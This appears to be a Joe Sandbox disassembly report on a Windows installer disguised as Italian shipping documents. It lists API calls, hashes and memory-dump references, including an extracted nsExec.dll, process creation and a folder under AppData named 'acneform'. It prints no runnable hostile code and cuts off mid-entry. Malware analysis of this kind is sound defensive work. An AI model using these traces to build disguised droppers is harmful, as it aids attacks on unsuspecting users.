                                        • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                        • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                                        • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                        • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                                        APIs
                                        • SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                        • Instruction ID: 777369a795cbaa9bd4fd16da76cbada5404ff361b75e364c58eeef3f96c31ac9
                                        • Opcode Fuzzy Hash: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                        • Instruction Fuzzy Hash: 6BB09235181600AADA115B40DE09F867BA2E7A4701F029438B340640B0CBB210A0DB08
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                        • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                        • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                        • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,004042CF), ref: 00404502
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                        • Instruction ID: 186c68f4495094c0cebc3eb7279f68ffc90812dad8dfd9e689695b78415bb769
                                        • Opcode Fuzzy Hash: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                        • Instruction Fuzzy Hash: 43A00176544A04ABCE12EB50EF4990ABB62BBA4B01B618879A285514388B325921EB19
                                        APIs
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                          • Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0), ref: 00405637
                                          • Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll), ref: 00405649
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                          • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                          • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                          • Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
                                          • Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29
                                          • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                        • String ID:
                                        • API String ID: 2972824698-0
                                        • Opcode ID: 3e0ab9320d322eb7e83734c8f16b68858ef74ab2c998c223a53f08904ab87bbd
                                        • Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
                                        • Opcode Fuzzy Hash: 3e0ab9320d322eb7e83734c8f16b68858ef74ab2c998c223a53f08904ab87bbd
                                        • Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E
                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 00404A16
                                        • SetWindowTextW.USER32(00000000,?), ref: 00404A40
                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
                                        • CoTaskMemFree.OLE32(00000000), ref: 00404AFC
                                        • lstrcmpiW.KERNEL32(Exec,0042CA68,00000000,?,?), ref: 00404B2E
                                        • lstrcatW.KERNEL32(?,Exec), ref: 00404B3A
                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C
                                          • Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE
                                          • Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                          • Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                          • Part of subcall function 00406805: CharNextW.USER32(?,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                          • Part of subcall function 00406805: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                        • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A
                                          • Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                          • Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
                                          • Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A$C:\Users\user\AppData\Local\acneform$Exec
                                        • API String ID: 2624150263-4003170230
                                        • Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                        • Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
                                        • Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                        • Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69
                                        APIs
                                        • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                        Strings
                                        • C:\Users\user\AppData\Local\acneform, xrefs: 0040226E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CreateInstance
                                        • String ID: C:\Users\user\AppData\Local\acneform
                                        • API String ID: 542301482-531015130
                                        • Opcode ID: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
                                        • Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
                                        • Opcode Fuzzy Hash: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
                                        • Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                        • Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
                                        • Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                        • Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                        • Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
                                        • Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                        • Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 00404F5B
                                        • GetDlgItem.USER32(?,00000408), ref: 00404F66
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
                                        • SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
                                        • SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
                                        • DeleteObject.GDI32(00000000), ref: 0040503D
                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F
                                          • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00405181
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
                                        • ShowWindow.USER32(?,00000005), ref: 0040519F
                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
                                        • ImageList_Destroy.COMCTL32(?), ref: 0040536D
                                        • GlobalFree.KERNEL32(?), ref: 0040537D
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
                                        • SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
                                        • ShowWindow.USER32(?,00000000), ref: 00405527
                                        • GetDlgItem.USER32(?,000003FE), ref: 00405532
                                        • ShowWindow.USER32(00000000), ref: 00405539
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 2564846305-813528018
                                        • Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                        • Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
                                        • Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                        • Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58
                                        APIs
                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
                                        • GetDlgItem.USER32(?,000003E8), ref: 00404747
                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
                                        • GetSysColor.USER32(?), ref: 00404775
                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
                                        • lstrlenW.KERNEL32(?), ref: 00404796
                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
                                        • GetDlgItem.USER32(?,0000040A), ref: 00404811
                                        • SendMessageW.USER32(00000000), ref: 00404818
                                        • GetDlgItem.USER32(?,000003E8), ref: 00404843
                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404894
                                        • SetCursor.USER32(00000000), ref: 00404897
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
                                        • SetCursor.USER32(00000000), ref: 004048B3
                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                        • String ID: Exec$N
                                        • API String ID: 3103080414-17853963
                                        • Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                        • Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
                                        • Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                        • Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98
                                        APIs
                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
